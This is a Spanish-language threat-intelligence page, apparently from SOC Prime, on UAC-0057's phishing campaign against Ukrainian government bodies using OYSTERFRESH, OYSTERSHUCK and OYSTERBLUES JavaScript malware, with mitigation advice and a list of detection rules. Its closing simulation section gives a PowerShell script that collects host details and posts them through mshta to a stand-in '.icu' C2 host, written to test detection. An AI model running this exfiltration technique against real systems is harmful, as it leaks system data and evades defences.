SOC Prime Bias: Medium

22 May 2026 12:56 UTC

UAC-0057 Actualiza Su Conjunto de Herramientas con OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES

Author Photo
SOC Prime Team linkedin icon Seguir
UAC-0057 Actualiza Su Conjunto de Herramientas con OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

CERT-UA ha informado sobre una campaña de phishing dirigida a organizaciones gubernamentales ucranianas. Los correos electrónicos contienen archivos adjuntos en PDF que redirigen a los destinatarios a archivos ZIP que alojan archivos JavaScript maliciosos conocidos como OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES. Una vez ejecutado, el malware recopila información del sistema y la envía a través de solicitudes HTTP POST, con la opción de recuperar un componente de Cobalt Strike en una etapa posterior. La infraestructura de soporte está oculta detrás de Cloudflare y hace un uso intensivo de .icu dominios.

Investigación

El análisis de CERT-UA identificó las muestras de JavaScript maliciosas, los métodos de decodificación en los que se basan, incluidos la inversión de cadenas, ROT13 y la decodificación de URL, y los cambios en el registro utilizados para mantener la persistencia. Los investigadores también documentaron múltiples artefactos de archivo y rutas de Windows asociadas con la cadena de infección. El análisis de red vinculó la actividad a la infraestructura de .icu alojamiento protegida por Cloudflare. El informe también señala la posible entrega posterior de un beacon de Cobalt Strike.

Mitigación

Las organizaciones deben restringir la ejecución de wscript.exe para usuarios estándar, limitar la ejecución tanto de PowerShell como de JavaScript y monitorear las claves de registro Run listadas para cambios sospechosos. Se debe utilizar el filtrado web para bloquear .icu dominios y, cuando sea apropiado, rangos de IP relacionados con Cloudflare asociados con la campaña. Los defensores también deben aplicar controles de mínimo privilegio y evitar la ejecución automática de binarios desconocidos.

Respuesta

Los equipos de seguridad deben crear detecciones para los nombres de archivo identificados, las claves de registro y el tráfico HTTP POST saliente hacia los dominios conocidos. La búsqueda también debe cubrir la posible carga útil de Cobalt Strike, incluido el DLL CSBEACON , y cualquier tarea programada denominada MicrosoftEdgeUpdateTaskMachine. Las investigaciones de endpoint deben recopilar árboles de procesos para rastrear la decodificación y ejecución de JavaScript.

Flujo de Ataque

Detecciones

Puntos de Persistencia Posibles [ASEPs – Hive de Software/NTUSER] (vía registry_event)

Equipo SOC Prime
22 de mayo de 2026

Extensión de Archivo Sospechosa Añadida a Claves de Ejecución [ASEPs] (vía registry_event)

Equipo SOC Prime
22 de mayo de 2026

Extracción de Archivo Directamente desde Cliente de Correo (vía process_creation)

Equipo SOC Prime
22 de mayo de 2026

Ejecución desde Archivo ZIP [7zip] (vía process_creation)

Equipo SOC Prime
22 de mayo de 2026

Ejecución desde Archivo RAR [WinRAR] (vía process_creation)

Equipo SOC Prime
22 de mayo de 2026

LOLBAS WScript / CScript (vía process_creation)

Equipo SOC Prime
22 de mayo de 2026

LOLBAS RunDLL32 (vía cmdline)

Equipo SOC Prime
22 de mayo de 2026

Archivos Extraídos Sospechosos de un Archivo (vía file_event)

Equipo SOC Prime
22 de mayo de 2026

Tarea Programada Sospechosa (vía audit)

Equipo SOC Prime
22 de mayo de 2026

Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior Inusual (TLD) (vía dns)

Equipo SOC Prime
22 de mayo de 2026

IOCs (HashSha256) para detectar: Kit de herramientas actualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES Parte 2

Reglas AI de SOC Prime
22 de mayo de 2026

IOCs (HashSha256) para detectar: Kit de herramientas actualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES Parte 1

Reglas AI de SOC Prime
22 de mayo de 2026

IOCs (HashSha1) para detectar: Kit de herramientas actualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES

Reglas AI de SOC Prime
22 de mayo de 2026

IOCs (HashMd5) para detectar: Kit de herramientas actualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES Parte 2

Reglas AI de SOC Prime
22 de mayo de 2026

IOCs (HashMd5) para detectar: Kit de herramientas actualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES Parte 1

Reglas AI de SOC Prime
22 de mayo de 2026

IOCs (SourceIP) para detectar: Kit de herramientas actualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES

Reglas AI de SOC Prime
22 de mayo de 2026

IOCs (DestinationIP) para detectar: Kit de herramientas actualizado UAC-0057: OYSTERFRESH, OYSTERSHUCK y OYSTERBLUES

Reglas AI de SOC Prime
22 de mayo de 2026

Detección de Exfiltración de OYSTERBLUES vía HTTP POST a Dominios .icu [Conexión de Red de Windows]

Reglas AI de SOC Prime
22 de mayo de 2026

Detección de Ejecución Maliciosa de JavaScript vía wscript.exe [Creación de Proceso de Windows]

Reglas AI de SOC Prime
22 de mayo de 2026

Ejecución de Simulación

Prerrequisito: El chequeo previo de telemetría y línea de base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y el relato reflejan directamente los TTP identificados y producen la telemetría exacta esperada por la lógica de detección.

  • Narrativa y Comandos de Ataque:
    El adversario utiliza un binario firmado de Windows (mshta.exe) para ejecutar una pequeña carga útil de JavaScript que recopila información del sistema y la exfiltra mediante un HTTP POST a un dominio malicioso “*.icu” controlado por el servidor C2. Este enfoque de “living‑off‑the‑land” evita generar alertas de AV al tiempo que genera el evento de firewall exacto que la regla monitorea (POST + “.icu”).

  • Script de Prueba de Regresión:

    # Simulacro de exfiltración estilo OYSTERBLUES
    # 1. Codificar información mínima del sistema en JSON
    $info = @{
        hostname = $env:COMPUTERNAME
        user     = $env:USERNAME
        os       = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
    } | ConvertTo-Json -Compress
    
    # 2. Escribir un archivo HTML temporal que ejecute un POST de captura de JS
    $htmlPath = "$env:TEMPexfil.html"
    $js = @"
      var data = '$info';
      fetch('http://malicious-c2.abc.icu/collect', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: data
      });
    "@
    Set-Content -Path $htmlPath -Value "<script>$js</script>" -Encoding ASCII
    
    # 3. Ejecutar vía mshta (ejecución de proxy de binario firmado)
    Start-Process -FilePath "$env:SystemRootSystem32mshta.exe" -ArgumentList "`"$htmlPath`""
    
    # 4. Dar tiempo a la solicitud para completarse y luego limpiar
    Start-Sleep -Seconds 5
    Remove-Item -Path $htmlPath -Force
  • Comandos de Limpieza:

    # Asegurarse de que los procesos mshta persistentes sean terminados
    Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Remover archivos temporales residuales (si existen)
    $tempFiles = Get-ChildItem -Path $env:TEMP -Filter "exfil.html"
    foreach ($file in $tempFiles) { Remove-Item $file.FullName -Force }